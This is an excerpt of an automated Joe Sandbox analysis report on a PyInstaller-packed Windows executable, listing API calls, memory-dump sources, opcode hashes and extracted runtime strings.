                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1217E71B0E292A5EA50BB5266047BAF651BF45BD5FCA4031FE0D277A6CE7DE041C320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 7d59e4c40900bb32387b6d96138c4a28a58e0b2ab210e317c35ca26ebe7fd99a
                                                                                                                                                                                                            • Instruction ID: d257121954ad7f83b24e13496ab3e6114e1ae586e19b04122d7d6aa0df7398fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d59e4c40900bb32387b6d96138c4a28a58e0b2ab210e317c35ca26ebe7fd99a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84319031A1E612A5E751BB25884037CF690AF51B95F8206B5FA2D233F2CF7CE8518370
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                            • Instruction ID: e56de3a77e36c1109090171b7aa4f20373f0aa374b694d8b0763171c483218bf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA119331A0F64591EE60FF51940127DE3A0BF85B80F8A4675FA8C676AACFBDE5008760
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 517f1388def26b6ea6af1a1c77ba5c260dc8b33e60c43458f0534b05beae82e8
                                                                                                                                                                                                            • Instruction ID: 59a8da97437db0539e2e6704cbed3f6fc7c3595fe59d22822e997818f70c412e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 517f1388def26b6ea6af1a1c77ba5c260dc8b33e60c43458f0534b05beae82e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC21C57260EA419BDB61EF28E440379B6A0EB84B95F994234E65D576F5DF3CD8008B10
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
                                                                                                                                                                                                            • Instruction ID: b4486ace17705be3bfb908ee76cdba10baf2b813e84337ec68bad77fef89bb56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2018271A0D78250EA04EF626A00069E791BF85FE0F894631EE5C67BE6CE3CD5114310
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF7ACE9A7E6,?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E), ref: 00007FF7ACE9DCC5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                            • Opcode ID: 706319e4b74843d5ad32e6c0b7fb19fe3c01a362d6ca9e09dab64425b174a517
                                                                                                                                                                                                            • Instruction ID: 336b29164cc2f0936125791fc1be451abe7c01209f9269399e311732448441cb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 706319e4b74843d5ad32e6c0b7fb19fe3c01a362d6ca9e09dab64425b174a517
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BF04970B0F31661FE54B66198503B8D6806F49B80F8E4470E90EFA3B1EEACE6908230
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF7ACE8FD74,?,?,?,00007FF7ACE91286,?,?,?,?,?,00007FF7ACE92879), ref: 00007FF7ACE9CA3A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                            • Opcode ID: 489c3d0cd44d140bc65b640a77535ff6cb9a2f4134c0d54aac00f59d377539c0
                                                                                                                                                                                                            • Instruction ID: ebfe9ee3236785c6688cc4bdd14591d709b8394d160fcda48212b523ced5d4e0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 489c3d0cd44d140bc65b640a77535ff6cb9a2f4134c0d54aac00f59d377539c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF05E30B0F38665FE64B6B15850278D1805F447E1F8A0670EC2FB53F2DEACE4409130
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc
• String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                                                            • API String ID: 190572456-3109299426
                                                                                                                                                                                                            • Opcode ID: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
                                                                                                                                                                                                            • Instruction ID: 18214d0df65889b5a8c88de98d60f10d03da459692f6e550886dbe3ef67501c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e6539b2492bcb566142f8ce84d8e1d9cc234e654b2aa916a41ae674904a9854
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC42E778A0FB43B5EA55AF19A890174B7A5AF04786BDA5135C80E3A2B4FF7CF514C320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                            • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                            • API String ID: 2446303242-1601438679
                                                                                                                                                                                                            • Opcode ID: 051afb74dd6d8b2a6ec501d8fa5556287ab5d0c90ea366ccf65a0a970d90b360
                                                                                                                                                                                                            • Instruction ID: 495748766eb145c82c20611f05ccf26b03c7e39802db9555aae69d9cf8f09550
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 051afb74dd6d8b2a6ec501d8fa5556287ab5d0c90ea366ccf65a0a970d90b360
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33A17A32209B819BE7149F11E5847AEB370F788B81F914129EB8D23B24CF7DE569CB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                            • Opcode ID: 3af33b1c53459be822e3926673cf8556ce12eec6cba7b9f0bf56be9fb2bd3e29
                                                                                                                                                                                                            • Instruction ID: bf05d4bef82292c95d6637168a0cca6ec4fa7c50a620d6ccd8a1be50fe4f199d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3af33b1c53459be822e3926673cf8556ce12eec6cba7b9f0bf56be9fb2bd3e29
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BB22472E1D2829FE7249E68D4407FDB7A1FB4438AF895135DA0D67AA4DF38E900CB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87447
                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87476
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 00007FF7ACE874CC
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                                                            • API String ID: 2920928814-2573406579
                                                                                                                                                                                                            • Opcode ID: 1ca30c699dbe1e4654e7c4d5696967e2b1b1a4f4c1085b5d0a2cfb7980eebcbf
                                                                                                                                                                                                            • Instruction ID: 17fb1699a05c61cbdc09241799714393370da5cb60ca5b8fb7cf3026fd644b7a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ca30c699dbe1e4654e7c4d5696967e2b1b1a4f4c1085b5d0a2cfb7980eebcbf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A521A131B0EA82A6E760EF10E84027AF6A1FF98346FC54035E54DA26B4EF3CD155C720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                            • Opcode ID: fbdfe3cbec041ac85cd1f64ea4b15fcfe09a87be1aa09ac25d8a719fe1a921a3
                                                                                                                                                                                                            • Instruction ID: 5cdc8236ba3edd1a04c0d69f64c4cd58851fee1a70d465b1c8bdee2caf4207c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbdfe3cbec041ac85cd1f64ea4b15fcfe09a87be1aa09ac25d8a719fe1a921a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4031727360DB8199EB609F60E8803EDB361FB44745F854039DA4E67BA8DF38D548CB20
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                            • Opcode ID: e7141d2691e6fffc336151182819a094942dc067ac16da689744b042d81b35af
                                                                                                                                                                                                            • Instruction ID: 524421e0cbc9ec56c27415ba1cb9c979d7c052f119fd1ead870d0783ffa5ae5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7141d2691e6fffc336151182819a094942dc067ac16da689744b042d81b35af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231B43361DB81A6EB60DF24E8402AEB3A0FB88755F850135EA8D53BA4DF3CC555CB10
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                            • Opcode ID: f73aa23eabfd20fda03901ff7faf855d9e478a94a0c2f1e1aa16d97b926a899c
                                                                                                                                                                                                            • Instruction ID: c9f3e98de7364faefdf41d73c3130f2a03373d05b88e5e864d0b95272ff02b72
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f73aa23eabfd20fda03901ff7faf855d9e478a94a0c2f1e1aa16d97b926a899c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4B1B632B1E6826DEA61AB2195002B9E390EF44BD5F8A5131ED5E27BE5DF3CE441C310
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                            • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                            • Instruction ID: cacc7587c640c3d8223a4519f15d54d57cda769437a3a7113cb3e9139fe9921a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21C16A72B1E6859BD724DF1AE08466AF791F788B85F8A8135DB4E23754CB3DE801CB00
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                            • Opcode ID: 90f8d2508151a2821edd8705c6830792bf37d4c2f418efb34635905aa3d93be8
                                                                                                                                                                                                            • Instruction ID: d3788ed96196b0ff439393f19f8f38d895ac84470e1aadccabde2ef8e808855f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90f8d2508151a2821edd8705c6830792bf37d4c2f418efb34635905aa3d93be8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79B18D77609B888FEB29DF29C4463687BE0F744B49F1A8922DA9D837B4CB39D451C710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                            • Opcode ID: d7ae6b57d221e0bba94e95162e8d18faf84dbf886ae199d20af9c81c2035df64
                                                                                                                                                                                                            • Instruction ID: 9b11875de9072b5e39a8aa8b326d0d00dde14219fd1978f64d3316790ce0f541
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7ae6b57d221e0bba94e95162e8d18faf84dbf886ae199d20af9c81c2035df64
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86F0D132A1E78196EBA09F64E488766B350EB40725F850335E66D226E4DF3CD018CB10
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                            • API String ID: 0-227171996
                                                                                                                                                                                                            • Opcode ID: a020c1348df748786c6fc3e6f0d32bf571f59c10c0dece7ade91a17eca74ce91
                                                                                                                                                                                                            • Instruction ID: a94a228d544a6fbf4df6b6c41135968fc4241f38ee8f220d184bc6db520730fe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a020c1348df748786c6fc3e6f0d32bf571f59c10c0dece7ade91a17eca74ce91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48E1C532A0E64692EF68AE25805017DF3A0FF45B48F964275EE0E677B4DF39E841C760
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                            • Opcode ID: 5a7a9f69d7c0008c7cda2ee947bdc0d9f87d51e3163b40c536a3f3ccbb6c484c
                                                                                                                                                                                                            • Instruction ID: 22e107aa50be863feb951f79ce30ed21f30434b2575592bd3c45da9d30416c25
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a7a9f69d7c0008c7cda2ee947bdc0d9f87d51e3163b40c536a3f3ccbb6c484c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D519833B1D2D156E7209E369800769FB91E744B90F898271DBAC8BBE1CF3ED5418710
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                            • Opcode ID: d9c3fe3541d8cc50b57763fefdf599488ea3422849496e59e15aa9730f7a25ee
                                                                                                                                                                                                            • Instruction ID: c00cb3ab24a1eaef5f697780ad7f4e8abc734c59596eecdcef249f01e42f7bca
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9c3fe3541d8cc50b57763fefdf599488ea3422849496e59e15aa9730f7a25ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE02B031A0F64264FE65BB119851279E680AF01BA0FC65675FD6E6A3F2DE3CE8018321
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                            • API String ID: 0-1523873471
Memory Dump Source
• Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
Memory Dump Source
• Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                            • Opcode ID: 78dcf682790de8efd8091c6720d965e488dfd40db2a2618002f9ee551094d6b6
                                                                                                                                                                                                            • Instruction ID: a1d850fa71989458f5179218ab479bc0e2b06bd955f7ac1936fae41fbc38f286
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78dcf682790de8efd8091c6720d965e488dfd40db2a2618002f9ee551094d6b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4410A72719A5995EF14DF26D964179F392B748FC0F4A9032EE0DABB68DE3CC5428300
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                                                                                                                                                                            • Instruction ID: 5ba6223915a384ff9dd1fa8f143d38298b976dfa85b48afc4ff16d85d1f4fa91
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B031C432B0EB8251E764AF21644012EE699AB84B90F454279FA5E63BF9DF3CD1018614
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 5cc313cde0fef028e89f201561a38ee75bc55530e34bae0ee9c1053def84ead7
                                                                                                                                                                                                            • Instruction ID: 37cce1612df64bf76fae2580c1494167d2e5bd631b23f6d3bb77ce5cd8625ac3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cc313cde0fef028e89f201561a38ee75bc55530e34bae0ee9c1053def84ead7
